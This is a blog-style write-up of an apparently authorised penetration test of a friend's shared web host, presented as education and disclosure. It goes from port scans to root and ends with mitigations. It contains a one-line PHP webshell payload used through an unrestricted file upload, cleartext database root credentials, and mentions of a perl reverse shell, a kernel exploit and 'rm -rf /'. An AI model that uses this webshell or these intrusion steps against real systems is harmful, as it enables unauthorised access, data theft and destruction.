Last summer I started learning about information security and hacking. Over the last year I’ve played in various wargames, capture the flag and penetration testing simulations, continuously improving my hacking skills and learning new things about ‘how to make computers deviate from their expected behavior’. Long story short, my experience was always limited to simulated environments, and since I consider myself a white-hat hacker (aka one of the good guys) I never stuck my nose into other peoples’ businesses — quite literally. Until now. This will be a detailed story about how I hacked into a server which hosted 40 (this is an exact number) websites and my findings. Some prerequisite CS knowledge is needed to follow through the technical parts of the article. Note: A friend messaged me that an was found in his website and that he wants me to take a further look. This is an important stage, as I am inclined to ask for him to formally express that I have his permission to perform a full test on his web application and on the server hosting it. The answer was XSS vulnerability positive. In the rest of the post I’ll be refering to my friend’s site as http://example.com The first move is always to enumerate and find as much information as you can about your enemy — while trying to alarm them as little as possible. At this stage we trigger our timer and start scanning. $ nmap --top-ports 1000 -T4 -sC Nmap scan report for example.com {redacted}Host is up (0.077s latency).rDNS record for {redacted}: {redacted}Not shown: 972 filtered portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh| ssh-hostkey:| {redacted}80/tcp open http| http-methods:|_ Potentially risky methods: TRACE|_http-title: Victim Site139/tcp open netbios-ssn443/tcp open https| http-methods:|_ Potentially risky methods: TRACE|_http-title: Site doesn't have a title (text/html; charset=UTF-8).|_{redacted}445/tcp open microsoft-ds5901/tcp open vnc-1| vnc-info:| Protocol version: 3.8| Security types:|_ VNC Authentication (2)8080/tcp open http-proxy|_http-title: 400 Bad Request8081/tcp open blackice-icecap http://example.com The scan completed in about 2 minutes. That’s a lot of open ports! By observing that the (port 21) and SMB (ports 139/445) ports are open we can guess that the server is used for file hosting and for file sharing, along with it being a webserver (ports 80/443 and proxies at 8080/8081). FTP From The Art of War. Enumerating is key. Doing a UDP port scan and scanning more than the top 1000 ports would be considered if the above scan’s information was not enough. The only port we are allowed to interact with (without credentials) is port 80/443. Without wasting any time, I launch to enumerate for any interesting files on the webserver while I’ll be digging for information manually. gobuster $ gobuster -u http://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 /admin/login Turns out the /admin path was an “admin tool” which allowed authenticated users to modify stuff on the webserver. It required credentials and since we have neither a username nor a password we move on. (spoiler: gobuster did not find anything of value) So far we are about 3 minutes in. Nothing useful, yet. Browsing to the website we see that it asks us to login. No problem, we create an account with a , click the confirmation e-mail and log-in after few seconds. dummy e-mail The website welcomes us and prompts us to navigate to our profile and update our profile picture. How kind. Seeing that the website looks custom built, I am inclined to test for an vulnerability. On my terminal I execute: Unrestricted File Upload echo "<?php system(\$_GET['cmd']); ?>" > exploit.php I try uploading the “image”, and bingo! The uploader allows the file to get uploaded. Of course it has no thumbnail, but that means my file got uploaded somewhere. exploit.php Get the exploit’s location Here we would expect that the uploader does some sort of processing on the uploaded file, checks its file extension and replaces with the accepted file extension like .jpeg, .jpg in order to avoid remote code execution by an attacker uploading malicious code, like yours truly. People care about security after all. right? Right? …RIGHT? `Copy image address` results in the following url being copied to our clipboard:http://www.example.com/admin/ftp/objects/XXXXXXXXXXXX.php So it seems we have our webshell ready and functioning: Seeing that the webserver runs scripts (really, perl?) we grab a perl reverse shell from our favorite , set the IP/Port and we are rewarded with a low-privileged shell — sorry, no screenshot. perl cheatsheet ~5 minutes in the assessment, and we already have a low-privilege shell. To my huge surprise, the server was not hosting only 1 website, but . Sadly I haven’t kept screenshots of every single detail but the output was along the lines of: 40 different ones $ ls /var/www access.log site1/ site2/ site3/ {... the list goes on} You get the point. Surprisingly, read access to the hosted websites was available, which meant I could read all the sites’ backend code. I limited myself to example.com’s code. ALL Notably, inside the directory, all the perl scripts were connecting to a mysql database . The credentials for the database were there in cleartext. Let these be cgi-admin/pages as root root:pwned42 Sure enough, the server was running MariaDB and I had to resort to this before being able to access the database. Afterwards we execute: issue mysql -u root -p -h localhost victimdbnamePassword: pwned42 And we’re in the database with root privileges. “use databasename;” allows us to access any of the 35 databases and view & modify their contents After just 7 minutes, we have full read/write access to the contents of 35(!) databases Here I am morally obligated to stop, and disclose my findings so far. The potential damage is already huge. What an attacker could do: Dump the contents of all the databases, as described , resulting in the data of all 35 companies to be leaked in the public domain. here Drop all the databases, effectively deleting the data of the 35 compaines Leave a backdoor for persistent access as apache with a cronjob, as described , in case they want a return trip. here I should note here that the mysql process was running as root so I figured I’d try executing in hopes of getting root. Unfortunately I was still apache. \! whoami Time to take a break. Stop the timer. What can further go wrong? After disclosing my findings, I get further permission to dig deeper. Before looking in ways to escalate my privileges to root and be able to cause massive potential damage, I was looking at what other interesting files I could read with my limited user. At that point, I remembered about the open SMB ports. That meant that there should be some folder somewhere that is being shared in the system among users. After a little enumeration, the following appears at the directory (please excuse me for the mass censorship): /home/samba/secured Inside all of these directories, there were files of each user of the That included all kinds of sensitive data, amongst others: hosting company. .psd/.ai files (Designers know how important it is to keep these private, it is their work and their techniques after all) Cookie sqlite files Invoices Pirated e-books (chuckled when I saw this) Credentials to their WiFi SSIDS What an attacker could do: Camp outside the company’s offices, login to their intranet and perform all kinds of fun attacks you can do on local networks Dump all the sensitive data listed above to the public domain It took some time to go through the folders and realize how serious this issue is.One more break. The final blow After looking around for a little longer as I decide it is time to go for the big fish, alas get root access. I refer to a popular and start enumerating the system for interesting files. apache cheatsheet Due to my digging so far I had already gone through most of these techniques already and did not seem to be able to find something that would increase my foothold. That’s when it hit me. In the Capture the Flag challenges that I am used to playing, the operating system is usually patched and it is some intentionally misconfigured service that eventually gives you the sought-after root privilege. In the real world however, people do not patch. I mean, look at Equifax (couldn’t resist). What kind of Linux is the server running? $ cat /etc/issueCentOS Linux release 7.2.1511 (Core) What version is the kernel? This looks like an old Kernel version. Does this remind you of something? If not, have a read (hint: it is VERY serious) here I found blogpost which pointed me to test if the Kernel was vulnerable with the script found here. this Timestamps & Firefox restored sites redacted Followed by: Game over. I instantly wrote an e-mail fully disclosing the details and potential impact of every step as described above, and wrapped the night. Whew. What an attacker could do: Read/modify ALL files on the server Leave a persistent backdoor (as done with apache) Install and potentially spread malware into the server’s intranet Install ransomware (taking the databases of 35 companies and all the hosting company’s data hostage is no small thing) Use the server as a cryptocurrency miner Use the server as a proxy Use the server as a C2C server Use the server as a part of a botnet … (use your imagination) (not even joking) rm -rf / The next day, I got contacted by my friend (who came in contact with the company operating the server) and was informed that the bug in the file uploader was fixed. tl;dr Summarizing,we found: A web application with an Unrestricted File Upload vulnerability, which led into a low privilege shell. Credentials to mysql database, which led to read/write access to 35 databases Lots of readable sensitive files Finally, we abused an unpatched kernel to obtain root access. Mitigations — Suggestions Let’s start by the uploader which gave us our inital foothold. Since the whole web application’s backend was written in perl — and as I do not speak perl — I cannot really suggest fixes on that. One fix I would suggest would be not to use perl in 2017 but that is just my opinion, feel free to prove me wrong. Regarding the filesystem, I recommend taking great care in assigning proper file permissions for users, according to the . That way, even if a low privileged user like apache gets access, they are not able to read any sensitive files. principle of least privilege Running all websites in the same server is a bad idea, I’m not sure if a dockerized approach would solve the issue. Having the same credentials for all databases is for sure a bad idea. Single points of failure are generally not good to have. Finally, . It’s literally 1 command: (CentOS specific) PATCH EVERYTHING **su -c 'yum update'** Thanks for reading and for making it until here, sorry for the long post. I wanted to be thorough, this was one serious situation 😄 Smash that clap button 50 times if you liked it! Shameless plug I am a 5th year Electrical & Computer Engineering student from Greece. I am interested in infosec, blockchain research & applications in modern businesses, and autonomous vehicles. Learn more about what I do at gakonst.com If you liked the content of this post and want to be updated about my work, follow me on and on Medium Twitter
